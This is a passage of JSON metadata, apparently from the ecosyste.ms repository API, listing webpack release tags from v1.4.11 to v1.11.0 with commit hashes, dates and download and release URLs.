:"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","